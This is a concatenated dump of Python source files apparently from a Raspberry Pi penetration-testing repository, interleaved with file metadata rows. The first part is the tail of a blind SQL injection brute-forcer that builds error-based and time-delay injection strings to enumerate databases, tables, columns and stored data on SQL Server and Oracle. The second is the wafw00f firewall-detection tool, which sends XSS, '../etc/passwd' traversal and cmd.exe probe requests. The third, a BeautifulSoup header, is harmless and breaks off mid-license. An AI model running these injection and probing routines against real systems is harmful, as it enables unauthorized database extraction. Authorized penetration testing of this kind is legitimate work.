urllib.unquote(self.workRequests[id])) print 'Response: %s' % results[0] print 'Results: %s, %s' % (results[1], results[2]) if not re.search(self.errorregex,results[0]) : # no error returned self.testcounter += 1 # increment counter 1 if no error returned if self.verbose>1: print "No Error" else: # error returned self.testcounter += 2 # increment counter 2 is error returned if self.verbose>1: print "Error" if self.testcounter == 3: # one failed, one passed request (success!) if self.verbose: print "Exploit and parameters appear to work\n" return(0) else: # failed :-( if self.andor == " OR ": # if we were using or, try changing to AND if self.verbose: print "OR doesn't appear to work - trying AND" self.andor = " AND " self.reqcounter = 0 self.testcounter = 0 return (self.testexploiterror()) else: print "User input exploit and parameters do not appear to work for error testing - trying time testing\n" return(self.testexploittime()) def testexploittime(self): teststring = "%3Bwaitfor delay '0:0:" + str(self.waitfor) + "'--" self.genreq(teststring, "", False) waiting = True while waiting: try: id, results = self.resultsQueue.get_nowait() except Queue.Empty: continue waiting = False if self.verbose>1: print 'Result %d: -> %s' % (id, urllib.unquote(self.workRequests[id])) print 'Response: %s' % results[0] print 'Start time: %s' % results[3] print 'Finish time: %s' % results[4] if results[4]-results[3] > (self.waitfor-self.waitres): # time testing worked self.method = "time" elapsed = results[4] - results[3] if elapsed > (self.waitfor * 2): # slow app self.timeout *= (elapsed/self.waitfor) if self.verbose: print "Exploit and parameters appear to work for time testing\n" return(0) else: # failed :-( print "User input exploit and parameters do not appear to work for time testing\n" return(1) # generate checks - these get multithreaded on the queue def genreq(self, request, match, type): if self.verb == "GET": # standard GET request- exploit querystring expressionString = self.targeturl[0] + request exploitdata="" elif (self.verb == "GET" and self.postdata): # post request, but exploit querystring expressionString = self.targeturl[0] + request exploitdata = self.postdata else: expressionString = self.targeturl[0] # standard post request, exploit post data exploitdata = self.postdata + request id = self.worker.performWork(self.doRequest, expressionString, exploitdata, match, type) if self.verb == "GET": self.workRequests[id] = expressionString else: self.workRequests[id] = exploitdata # handle underscores def unquote(self, s): return re.sub(r'\[\_\]','_',s) # generate the testing string as a series of CHAR()+CHAR or CONCAT(CHR(),CHR()) strings def genchars(self, s): t = self.unquote(s) foo = len(t) if self.dbtype=="oracle": # use concat statements for oracle if foo==1: # one character - no concat bar = "CHR("+str(ord(t[0].upper()))+")" else: # generate one concat statement if foo==2: bar = "CONCAT(CHR("+str(ord(t[0].upper()))+"),CHR("+str(ord(t[1].upper()))+"))" else: # generate mutiple statements bar = "" for i in range((foo-1)): bar += "CONCAT(CHR("+str(ord(t[i].upper()))+")," bar += "CHR("+str(ord(t[foo-1].upper()))+")" for i in range(foo-1): bar += ")" else: # sql server, so use + signs for concatentation if foo==1: # one char bar = "CHAR("+str(ord(t[0].upper()))+")" else: # generate CHAR()+CHAR() statements bar = "" for i in range((foo-1)): bar += "CHAR("+str(ord(t[i].upper()))+")%2B" bar += "CHAR("+str(ord(t[foo-1].upper()))+")" return bar # generate the guess cases - error def gentesterror(self, s): foo = "" if self.dbtype == "sqlserver": foo = "xtype='u' and " # SQL injection constructors - these assume we can just add these onto the end of the URL or post data if self.enumtype=="database": # sql server only pretable = self.andor + "exists (select * from master..sysdatabases where " + self.substrfn + "(UPPER(" + self.namecol + "),1," midtable = ")=" posttable = ")--" if self.enumtype=="table": pretable = self.andor + "exists (select * from " + self.database + self.tablesource + " where " + foo + self.substrfn + "(UPPER(" + self.namecol + "),1," midtable = ")=" posttable = ")--" if self.enumtype=="column": if self.dbtype=="sqlserver": pretable = self.andor + "exists (select * from " + self.database + "syscolumns where id = object_id('" + self.database + self.table + "') and " + self.substrfn + "(UPPER(" + self.namecol + "),1," midtable = ")=" posttable = ")--" else: pretable = self.andor + "exists (select * from ALL_TAB_COLUMNS where TABLE_NAME=UPPER('" + self.table + "') and " + self.substrfn + "(UPPER(COLUMN_NAME),1," midtable = ")=" posttable = ")--" if self.enumtype=="data": if self.dbtype=="sqlserver": if self.wherecol == "": # no where clause supplied pretable = self.andor + "exists (select * from " + self.database + self.table + " where " + self.substrfn + "(UPPER(convert(varchar," + self.cols + ",2)),1," else: # where clause supplied pretable = self.andor + "exists (select * from " + self.database + self.table + " where " + self.wherecol + "='" + self.whereval + "' and " + self.substrfn + "(UPPER(convert(varchar," + self.cols + ",2)),1," midtable = ")=" posttable = ")--" else: # oracle if self.wherecol == "": # no where clause supplied pretable = self.andor + "exists (select * from " + self.table + " where " + self.substrfn + "(UPPER(TO_CHAR(" + self.cols + ")),1," else: # where clause supplied pretable = self.andor + "exists (select * from " + self.table + " where " + self.wherecol + "='" + self.whereval + "' and " + self.substrfn + "(UPPER(TO_CHAR(" + self.cols + ")),1," midtable = ")=" posttable = ")--" teststring = self.genchars(s) self.genreq(pretable + str(len(self.unquote(s))) + midtable + teststring + posttable, s, True) # generate test cases - time def gentesttime(self, s): prewaitforlike = "%3Bif EXISTS (select name from master..sysdatabases where name like '" postwaitfor = "%') waitfor delay '0:0:" + str(self.waitfor) + "'--" predblike = "%3Bif EXISTS (select name from " + self.database + "sysobjects where xtype = 'u' and name like '" pretablike = "%3Bif EXISTS (select name from " + self.database + "syscolumns where id in (select id from " + self.database + "sysobjects where name = '" + self.table + "') and name like '" if self.whereval=="": # enumerating values in a specific column predatalike = "%3Bif EXISTS (select * from " + self.database + self.table + " where CONVERT(varchar," + self.cols + ",2) like '" else: prejoinlike = "%3Bif EXISTS (select * from " + self.database + self.table + " where CONVERT(varchar," + self.wherecol + ",2) = '" + self.whereval + "' AND CONVERT(varchar," + self.cols + ",2) like '" if self.enumtype=="database": self.genreq(prewaitforlike + s + postwaitfor, s, True) if self.enumtype=="table": self.genreq(predblike + s + postwaitfor, s, True) if self.enumtype=="column": self.genreq(pretablike + s + postwaitfor, s, True) if self.enumtype=="data": if self.whereval=="": self.genreq(predatalike + s + postwaitfor,s,True) else: self.genreq(prejoinlike + s + postwaitfor,s,True) def checkmatchtime(self, s): prewaitforequals = "%3Bif EXISTS (select name from master..sysdatabases where name = '" postwaitforequals = "') waitfor delay '0:0:" + str(self.waitfor) + "'--" predbequals = "%3Bif EXISTS (select name from " + self.database + "sysobjects where xtype = 'u' and name = '" pretabequals = "%3Bif EXISTS (select name from " + self.database + "syscolumns where id in (select id from " + self.database + "sysobjects where name = '" + self.table + "') and name = '" if self.whereval=="": # enumerating values in a specific column predataequals = "%3Bif EXISTS (select * from " + self.database + self.table + " where CONVERT(varchar," + self.cols + ",2) = '" else: prejoinequals = "%3Bif EXISTS (select * from " + self.database + self.table + " where CONVERT(varchar," + self.wherecol + ",2) = '" + self.whereval + "' AND CONVERT(varchar, " + self.cols + ",2) = '" if self.enumtype=="database": self.genreq(prewaitforequals + self.unquote(s) + postwaitforequals, s, False) if self.enumtype=="table": self.genreq(predbequals + self.unquote(s) + postwaitforequals, s, False) if self.enumtype=="column": self.genreq(pretabequals + self.unquote(s) + postwaitforequals, s, False) if self.enumtype=="data": if self.whereval=="": self.genreq(predataequals + self.unquote(s) + postwaitforequals, s, False) else: self.genreq(prejoinequals + self.unquote(s) + postwaitforequals, s, False) # generate check for whether we have an exact match (error testing) def checkmatcherror(self, s): foo = "" if self.dbtype == "sqlserver": foo = "xtype='u' and " # SQL injection constructors - these assume we can just add these onto the end of the URL or post data if self.enumtype=="database": # only valid for sql server pretable = self.andor + "exists (select * from master..sysdatabases where UPPER(" + self.namecol + ")=" posttable = ")--" if self.enumtype=="table": pretable = self.andor + "exists (select * from " + self.database + self.tablesource + " where UPPER(" + self.namecol +")=" posttable = " )--" if self.enumtype=="column": if self.dbtype=="sqlserver": pretable = self.andor + "exists (select * from " + self.database + "syscolumns where id = object_id(" + self.genchars(self.database + self.table) + ") and UPPER(" + self.namecol + ")=" posttable = ")--" else: pretable = self.andor + "exists (select * from ALL_TAB_COLUMNS where TABLE_NAME=UPPER(" + self.genchars(self.table) + ") and UPPER(COLUMN_NAME)=" posttable = ")--" if self.enumtype=="data": if self.dbtype=="sqlserver": if self.wherecol == "": # no where clause supplied pretable = self.andor + "exists (select * from " + self.database + self.table + " where UPPER(convert(varchar," + self.cols + ",2))=" else: # where clause supplied pretable = self.andor + "exists (select * from " + self.database + self.table + " where " + self.wherecol + "=" + self.genchars(self.whereval) + " and UPPER(convert(varchar," + self.cols + ",2))=" posttable = ")--" else: # oracle if self.wherecol == "": # no where clause supplied pretable = self.andor + "exists (select * from " + self.table + " where UPPER(TO_CHAR(" + self.cols + "))=" else: # where clause supplied pretable = self.andor + "exists (select * from " + self.table + " where " + self.wherecol + "=" + self.genchars(self.whereval) + " and UPPER(TO_CHAR(" + self.cols + "))=" midtable = ")=" posttable = ")--" teststring = self.genchars(s) self.genreq(pretable + teststring + posttable, s, False) # used to check results and exact checks def showResults(self): self.timetrack = time.time() while True: try: id, results = self.resultsQueue.get_nowait() except Queue.Empty: if (time.time() - self.timetrack) > self.timeout: # if its been > (timeout) seconds since last successful resp break else: continue self.timetrack = time.time() # update record of last successful response if self.verbose>1: print 'Result %d: -> %s' % (id, urllib.unquote(self.workRequests[id])) print 'Results: %s, %s' % (results[1], results[2]) print 'Start time: %s' % results[3] print 'Finish time: %s' % results[4] if self.verbose>2: print 'Response: %s' % results[0] if self.method == "error": # if using error testing if not re.search(self.errorregex,results[0]) : # no error returned if self.verbose > 1: print 'No error' if results[2]: # if a guess match test if self.verbose: print "%s" % self.unquote(results[1]) self.checkmatcherror(results[1]) else: print "Found: %s" % self.unquote(results[1]) for i in self.matches: self.gentesterror(results[1]+i) if self.outputfile != "": outputhandle = file(self.outputfile, 'a', 0) outputhandle.write(self.unquote(results[1])+"\r\n") outputhandle.close() else: # no match if self.verbose > 1: print 'Error detected' if not results[2]: # if was an exact match test (and failed) generate more for i in self.matches: self.gentesterror(results[1]+i) else: # if time based testing if results[4]-results[3] > (self.waitfor-self.waitres): # we had a match if results[2]: # guess match test if self.verbose: print "%s" % self.unquote(results[1]) self.checkmatchtime(results[1]) else: # exact match test print "Found: %s" % self.unquote(results[1]) for i in self.matches: self.gentesttime(results[1]+i) if self.outputfile != "": outputhandle = file(self.outputfile, 'a', 0) outputhandle.write(self.unquote(results[1])+"\r\n") outputhandle.close() else: # no match if not results[2]: # if it was an exact match condition (and failed) - iterate further for i in self.matches: self.gentesttime(results[1]+i) # main called here if __name__ == "__main__": instance = sqlbrute() sys.exit(instance.main())
31,398
Python
.py
586
40.296928
227
0.530157
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
18,907
wafw00f.py
pwnieexpress_raspberry_pwn/src/pentest/waffit/wafw00f.py
#!/usr/bin/env python # wafw00f - Web Application Firewall Detection Tool # by Sandro Gauci - enablesecurity.com (c) 2009 # and Wendel G. Henrique - Trustwave 2009 __license__ = """ Copyright (c) 2009, {Sandro Gauci|Wendel G. Henrique} All rights reserved. Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: * Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. * Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. * Neither the name of EnableSecurity or Trustwave nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. """ import os import httplib from urllib import quote, unquote import urllib2 from optparse import OptionParser import logging import socket import sys currentDir = os.getcwd() scriptDir = os.path.dirname(sys.argv[0]) or '.' os.chdir( scriptDir ) from libs.evillib import * __version__ = '0.9.0' lackofart = """ ^ ^ _ __ _ ____ _ __ _ _ ____ ///7/ /.' \ / __////7/ /,' \ ,' \ / __/ | V V // o // _/ | V V // 0 // 0 // _/ |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/ < ...' WAFW00F - Web Application Firewall Detection Tool By Sandro Gauci && Wendel G. Henrique """ class WafW00F(waftoolsengine): """ WAF detection tool """ xssstring = '<script>alert(1)</script>' dirtravstring = '../../../../etc/passwd' cleanhtmlstring = '<invalid>hello' def __init__(self,target='www.microsoft.com',port=80,ssl=False, debuglevel=0,path='/',followredirect=True): """ target: the hostname or ip of the target server port: defaults to 80 ssl: defaults to false """ waftoolsengine.__init__(self,target,port,ssl,debuglevel,path,followredirect) self.log = logging.getLogger('wafw00f') self.knowledge = dict(generic=dict(found=False,reason=''),wafname=list()) def normalrequest(self,usecache=True,cacheresponse=True,headers=None): return self.request(usecache=usecache,cacheresponse=cacheresponse,headers=headers) def normalnonexistentfile(self,usecache=True,cacheresponse=True): import random path = self.path + str(random.randrange(1000,9999)) + '.html' return self.request(path=path,usecache=usecache,cacheresponse=cacheresponse) def unknownmethod(self,usecache=True,cacheresponse=True): return self.request(method='OHYEA',usecache=usecache,cacheresponse=cacheresponse) def directorytraversal(self,usecache=True,cacheresponse=True): return self.request(path=self.path+self.dirtravstring,usecache=usecache,cacheresponse=cacheresponse) def cleanhtmlencoded(self,usecache=True,cacheresponse=True): string = self.path + quote(self.cleanhtmlstring) + '.html' return self.request(path=string,usecache=usecache,cacheresponse=cacheresponse) def cleanhtml(self,usecache=True,cacheresponse=True): string = self.path + self.cleanhtmlstring + '.html' return self.request(path=string,usecache=usecache,cacheresponse=cacheresponse) def xssstandard(self,usecache=True,cacheresponse=True): xssstringa = self.path + self.xssstring + '.html' return self.request(path=xssstringa,usecache=usecache,cacheresponse=cacheresponse) def xssstandardencoded(self,usecache=True,cacheresponse=True): xssstringa = self.path + quote(self.xssstring) + '.html' return self.request(path=xssstringa,usecache=usecache,cacheresponse=cacheresponse) def cmddotexe(self,usecache=True,cacheresponse=True): # thanks j0e string = self.path + 'cmd.exe' return self.request(path=string,usecache=usecache,cacheresponse=cacheresponse) attacks = [cmddotexe,directorytraversal,xssstandard,xssstandardencoded] def genericdetect(self,usecache=True,cacheresponse=True): reason = '' reasons = ['Blocking is being done at connection/packet level.', 'The server header is different when an attack is detected.', 'The server returned a different response code when a string trigged the blacklist.', 'It closed the connection for a normal request.', 'The connection header was scrambled.' ] # test if response for a path containing html tags with known evil strings # gives a different response from another containing invalid html tags r = self.cleanhtml() if r is None: self.knowledge['generic']['reason'] = reasons[0] self.knowledge['generic']['found'] = True return True cleanresponse,_tmp =r r = self.xssstandard() if r is None: self.knowledge['generic']['reason'] = reasons[0] self.knowledge['generic']['found'] = True return True xssresponse,_tmp = r if xssresponse.status != cleanresponse.status: self.log.info('Server returned a different response when a script tag was tried') reason = reasons[2] reason += '\r\n' reason += 'Normal response code is "%s",' % cleanresponse.status reason += ' while the response code to an attack is "%s"' % xssresponse.status self.knowledge['generic']['reason'] = reason self.knowledge['generic']['found'] = True return True r = self.cleanhtmlencoded() cleanresponse,_tmp = r r = self.xssstandardencoded() if r is None: self.knowledge['generic']['reason'] = reasons[0] self.knowledge['generic']['found'] = True return True xssresponse,_tmp = r if xssresponse.status != cleanresponse.status: self.log.info('Server returned a different response when a script tag was tried') reason = reasons[2] reason += '\r\n' reason += 'Normal response code is "%s",' % cleanresponse.status reason += ' while the response code to an attack is "%s"' % xssresponse.status self.knowledge['generic']['reason'] = reason self.knowledge['generic']['found'] = True return True response, responsebody = self.normalrequest() normalserver = response.getheader('Server') for attack in self.attacks: r = attack(self) if r is None: self.knowledge['generic']['reason'] = reasons[0] self.knowledge['generic']['found'] = True return True response, responsebody = r attackresponse_server = response.getheader('Server') if attackresponse_server: if attackresponse_server != normalserver: self.log.info('Server header changed, WAF possibly detected') self.log.debug('attack response: %s' % attackresponse_server) self.log.debug('normal response: %s' % normalserver) reason = reasons[1] reason += '\r\nThe server header for a normal response is "%s",' % normalserver reason += ' while the server header a response to an attack is "%s.",' % attackresponse_server self.knowledge['generic']['reason'] = reason self.knowledge['generic']['found'] = True return True for attack in self.wafdetectionsprio: if self.wafdetections[attack](self) is None: self.knowledge['generic']['reason'] = reasons[0] self.knowledge['generic']['found'] = True return True for attack in self.attacks: r = attack(self) if r is None: self.knowledge['generic']['reason'] = reasons[0] self.knowledge['generic']['found'] = True return True response, responsebody = r for h,v in response.getheaders(): if scrambledheader(h): self.knowledge['generic']['reason'] = reasons[4] self.knowledge['generic']['found'] = True return True return False def matchheader(self,headermatch,attack=False,ignorecase=True): import re detected = False header,match = headermatch if attack: requests = self.attacks else: requests = [self.normalrequest] for request in requests: r = request(self) if r is None: return response,responsebody = r headerval = response.getheader(header) if headerval: # set-cookie can have multiple headers, python gives it to us # concatinated with a comma if header == 'set-cookie': headervals = headerval.split(', ') else: headervals = [headerval] for headerval in headervals: if ignorecase: if re.match(match,headerval,re.IGNORECASE): detected = True break else: if re.match(match,headerval): detected = True break if detected: break return detected def isbigip(self): return self.matchheader(('X-Cnection','^close$'), attack=True) def iswebknight(self): detected = False for attack in self.attacks: r = attack(self) if r is None: return response, responsebody = r if response.status == 999: detected = True break return detected def ismodsecurity(self): detected = False for attack in self.attacks: r = attack(self) if r is None: return response, responsebody = r if response.status == 501: detected = True break return detected def issecureiis(self): # credit goes to W3AF detected = False headers = dict() headers['Transfer-Encoding'] = 'z' * 1025 r = self.normalrequest(headers=headers) if r is None: return response,responsebody = r if response.status == 404: detected = True return detected def matchcookie(self,match): """ a convenience function which calls matchheader """ return self.matchheader(('set-cookie',match)) def isairlock(self): # credit goes to W3AF return self.matchcookie('^AL[_-]?(SESS|LB)=') def isbarracuda(self): # credit goes to W3AF return self.matchcookie('^barra_counter_session=') def isdenyall(self): # credit goes to W3AF if self.matchcookie('^sessioncookie='): return True # credit goes to Sebastien Gioria # Tested against a Rweb 3.8 # and modified by sandro gauci and someone else for attack in self.attacks: r = attack(self) if r is None: return response, responsebody = r if response.status == 200: if response.reason == 'Condition Intercepted': return True return False def isbeeware(self): # disabled cause it was giving way too many false positives # credit goes to Sebastien Gioria detected = False r = self.xssstandard() if r is None: return response, responsebody = r if (response.status != 200) or (response.reason == 'Forbidden'): r = self.directorytraversal() if r is None: return response, responsebody = r if response.status == 403: if response.reason == "Forbidden": detected = True return detected def isf5asm(self): # credit goes to W3AF return self.matchcookie('^TS[a-zA-Z0-9]{3,6}=') def isf5trafficshield(self): for hv in [['cookie','^ASINFO='],['server','F5-TrafficShield']]: r = self.matchheader(hv) if r is None: return elif r: return r return False def isteros(self): # credit goes to W3AF return self.matchcookie('^st8id=') def isnetcontinuum(self): # credit goes to W3AF return self.matchcookie('^NCI__SessionId=') def isbinarysec(self): # credit goes to W3AF return self.matchheader(('server','BinarySec')) def ishyperguard(self): # credit goes to W3AF return self.matchcookie('^WODSESSION=') def isprofense(self): """ Checks for server headers containing "profense" """ return self.matchheader(('server','profense')) def isnetscaler(self): """ First checks if a cookie associated with Netscaler is present, if not it will try to find if a "Cneonction" or "nnCoection" is returned for any of the attacks sent """ # NSC_ and citrix_ns_id come from David S. Langlands <dsl 'at' surfstar.com> if self.matchcookie('^(ns_af=|citrix_ns_id|NSC_)'): return True if self.matchheader(('Cneonction','close'),attack=True): return True if self.matchheader(('nnCoection','close'),attack=True): return True return False def isurlscan(self): detected = False testheaders = dict() testheaders['Translate'] = 'z'*10 testheaders['If'] = 'z'*10 testheaders['Lock-Token'] = 'z'*10 testheaders['Transfer-Encoding'] = 'z'*10 r = self.normalrequest() if r is None: return response,_tmp = r r = self.normalrequest(headers=testheaders) if r is None: return response2,_tmp = r if response.status != response2.status: if response2.status == 404: detected = True return detected def iswebscurity(self): detected = False r = self.normalrequest() if r is None: return response,responsebody=r if response.status == 403: return detected newpath = self.path + '?nx=@@' r = self.request(path=newpath) if r is None: return response,responsebody = r if response.status == 403: detected = True return detected def isdotdefender(self): # thanks to j0e return self.matchheader(['X-dotDefender-denied', '^1$'],attack=True) def isimperva(self): # thanks to Mathieu Dessus <mathieu.dessus(a)verizonbusiness.com> for this # might lead to false positives so please report back to sandro@enablesecurity.com for attack in self.attacks: r = attack(self) if r is None: return response, responsebody = r if response.version == 10: return True return False def ismodsecuritypositive(self): import random detected = False self.normalrequest(usecache=False,cacheresponse=False) randomfn = self.path + str(random.randrange(1000,9999)) + '.html' r = self.request(path=randomfn) if r is None: return response,responsebody = r if response.status != 302: return False randomfnnull = randomfn+'%00' r = self.request(path=randomfnnull) if r is None: return response,responsebody = r if response.status == 404: detected = True return detected wafdetections = dict() # easy ones wafdetections['Profense'] = isprofense wafdetections['ModSecurity'] = ismodsecurity wafdetections['NetContinuum'] = isnetcontinuum wafdetections['HyperGuard'] = ishyperguard wafdetections['Barracuda'] = isbarracuda wafdetections['Airlock'] = isairlock wafdetections['BinarySec'] = isbinarysec wafdetections['F5 Trafficshield'] = isf5trafficshield wafdetections['F5 ASM'] = isf5asm wafdetections['Teros'] = isteros wafdetections['DenyALL'] = isdenyall wafdetections['BIG-IP'] = isbigip wafdetections['Citrix NetScaler'] = isnetscaler # lil bit more complex wafdetections['webApp.secure'] = iswebscurity wafdetections['WebKnight'] = iswebknight wafdetections['URLScan'] = isurlscan wafdetections['SecureIIS'] = issecureiis wafdetections['dotDefender'] = isdotdefender #wafdetections['BeeWare'] = isbeeware # wafdetections['ModSecurity (positive model)'] = ismodsecuritypositive removed for now wafdetections['Imperva'] = isimperva wafdetectionsprio = ['Profense','NetContinuum', 'Barracuda','HyperGuard','BinarySec','Teros', 'F5 Trafficshield','F5 ASM','Airlock','Citrix NetScaler', 'ModSecurity', 'DenyALL', 'dotDefender','webApp.secure', # removed for now 'ModSecurity (positive model)', 'BIG-IP','URLScan','WebKnight', 'SecureIIS','Imperva'] def identwaf(self,findall=False): detected = list() for wafvendor in self.wafdetectionsprio: self.log.info('Checking for %s' % wafvendor) if self.wafdetections[wafvendor](self): detected.append(wafvendor) if not findall: break self.knowledge['wafname'] = detected return detected def calclogginglevel(verbosity): default = 40 # errors are printed out level = default - (verbosity*10) if level < 0: level = 0 return level class wafwoof_api: def __init__(self): self.cache = dict() def vendordetect(self,url,findall=False): if self.cache.has_key(url): wafw00f = self.cache[url] else: r = oururlparse(url) if r is None: return [''] (hostname,port,path,query,ssl) = r wafw00f = WafW00F(target=hostname,port=port,path=path,ssl=ssl) self.cache[url] = wafw00f return wafw00f.identwaf(findall=findall) def genericdetect(self,url): if self.cache.has_key(url): wafw00f = self.cache[url] else: r = oururlparse(url) if r is None: return {} (hostname,port,path,query,ssl) = r wafw00f = WafW00F(target=hostname,port=port,path=path,ssl=ssl) self.cache[url] = wafw00f wafw00f.genericdetect() return wafw00f.knowledge['generic'] def alltests(self,url,findall=False): if self.cache.has_key(url): wafw00f = self.cache[url] else: r = oururlparse(url) if r is None: return {} (hostname,port,path,query,ssl) = r wafw00f = WafW00F(target=hostname,port=port,path=path,ssl=ssl) self.cache[url] = wafw00f wafw00f.identwaf(findall=findall) if (len(wafw00f.knowledge['wafname']) == 0) or (findall): wafw00f.genericdetect() return wafw00f.knowledge def xmlrpc_interface(bindaddr=('localhost',8001)): from SimpleXMLRPCServer import SimpleXMLRPCServer from SimpleXMLRPCServer import SimpleXMLRPCRequestHandler class RequestHandler(SimpleXMLRPCRequestHandler): rpc_paths = ('/RPC2',) server = SimpleXMLRPCServer(bindaddr, requestHandler=RequestHandler) server.register_introspection_functions() server.register_instance(wafwoof_api()) try: server.serve_forever() except KeyboardInterrupt: print "bye!" return def main(): print lackofart parser = OptionParser(usage="""%prog url1 [url2 [url3 ... ]]\r\nexample: %prog http://www.victim.org/""") parser.add_option('-v','--verbose',action='count', dest='verbose', default=0, help="enable verbosity - multiple -v options increase verbosity") parser.add_option('-a','--findall',action='store_true', dest='findall', default=False, help="Find all WAFs, do not stop testing on the first one") parser.add_option('-r','--disableredirect',action='store_false',dest='followredirect', default=True, help='Do not follow redirections given by 3xx responses') parser.add_option('-t','--test',dest='test', help='Test for one specific WAF') parser.add_option('-l','--list',dest='list', action='store_true', default=False,help='List all WAFs that we are able to detect') parser.add_option('--xmlrpc',dest='xmlrpc', action='store_true', default=False,help='Switch on the XML-RPC interface instead of CUI') parser.add_option('--xmlrpcport',dest='xmlrpcport', type='int', default=8001,help='Specify an alternative port to listen on, default 8001') parser.add_option('--version','-V',dest='version', action='store_true', default=False,help='Print out the version') options,args = parser.parse_args() logging.basicConfig(level=calclogginglevel(options.verbose+1)) log = logging.getLogger() if options.list: print "Can test for these WAFs:\r\n" attacker = WafW00F(None) print '\r\n'.join(attacker.wafdetectionsprio) return if options.version: print 'WAFW00F version %s' % __version__ return elif options.xmlrpc: print "Starting XML-RPC interface" xmlrpc_interface(bindaddr=('localhost',options.xmlrpcport)) return if len(args) == 0: parser.error("we need a target site") targets = args for target in targets: print "Checking %s" % target pret = oururlparse(target) if pret is None: log.critical('The url %s is not well formed' % target) sys.exit(1) (hostname,port,path,query,ssl) = pret log.info('starting wafw00f on %s' % target) attacker = WafW00F(hostname,port=port,ssl=ssl, debuglevel=options.verbose,path=path, followredirect=options.followredirect) if attacker.normalrequest() is None: log.error('Site %s appears to be down' % target) sys.exit(1) if options.test: if attacker.wafdetections.has_key(options.test): waf = attacker.wafdetections[options.test](attacker) if waf: print "The site %s is behind a %s" % (target, options.test) else: print "WAF %s was not detected on %s" % (options.test,target) else: print "WAF %s was not found in our list\r\nUse the --list option to see what is available" % options.test return waf = attacker.identwaf(options.findall) log.info('Ident WAF: %s' % waf) if len(waf) > 0: print 'The site %s is behind a %s' % (target, ' and/or '.join( waf)) if (options.findall) or len(waf) == 0: print 'Generic Detection results:' if attacker.genericdetect(): log.info('Generic Detection: %s' % attacker.knowledge['generic']['reason']) print 'The site %s seems to be behind a WAF ' % target print 'Reason: %s' % attacker.knowledge['generic']['reason'] else: print 'No WAF detected by the generic detection' print 'Number of requests: %s' % attacker.requestnumber if __name__ == '__main__': if sys.hexversion < 0x2040000: sys.stderr.write('Your version of python is way too old .. please update to 2.4 or later\r\n') main()
26,009
Python
.py
585
32.967521
130
0.596721
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
18,908
BeautifulSoup.py
pwnieexpress_raspberry_pwn/src/pentest/waffit/libs/BeautifulSoup.py
"""Beautiful Soup Elixir and Tonic "The Screen-Scraper's Friend" http://www.crummy.com/software/BeautifulSoup/ Beautiful Soup parses a (possibly invalid) XML or HTML document into a tree representation. It provides methods and Pythonic idioms that make it easy to navigate, search, and modify the tree. A well-formed XML/HTML document yields a well-formed data structure. An ill-formed XML/HTML document yields a correspondingly ill-formed data structure. If your document is only locally well-formed, you can use this library to find and process the well-formed part of it. Beautiful Soup works with Python 2.2 and up. It has no external dependencies, but you'll have more success at converting data to UTF-8 if you also install these three packages: * chardet, for auto-detecting character encodings http://chardet.feedparser.org/ * cjkcodecs and iconv_codec, which add more encodings to the ones supported by stock Python. http://cjkpython.i18n.org/ Beautiful Soup defines classes for two main parsing strategies: * BeautifulStoneSoup, for parsing XML, SGML, or your domain-specific language that kind of looks like XML. * BeautifulSoup, for parsing run-of-the-mill HTML code, be it valid or invalid. This class has web browser-like heuristics for obtaining a sensible parse tree in the face of common HTML errors. Beautiful Soup also defines a class (UnicodeDammit) for autodetecting the encoding of an HTML or XML document, and converting it to Unicode. Much of this code is taken from Mark Pilgrim's Universal Feed Parser. For more than you ever wanted to know about Beautiful Soup, see the documentation: http://www.crummy.com/software/BeautifulSoup/documentation.html Here, have some legalese: Copyright (c) 2004-2008, Leonard Richardson All rights reserved. Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: * Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. * Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. * Neither the name of the the Beautiful Soup Consortium and All Night Kosher Bakery nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE, DAMMIT. """ from __future__ import generators __author__ = "Leonard Richardson (leonardr@segfault.org)" __version__ = "3.0.7a" __copyright__ = "Copyright (c) 2004-2008 Leonard Richardson" __license__ = "New-style 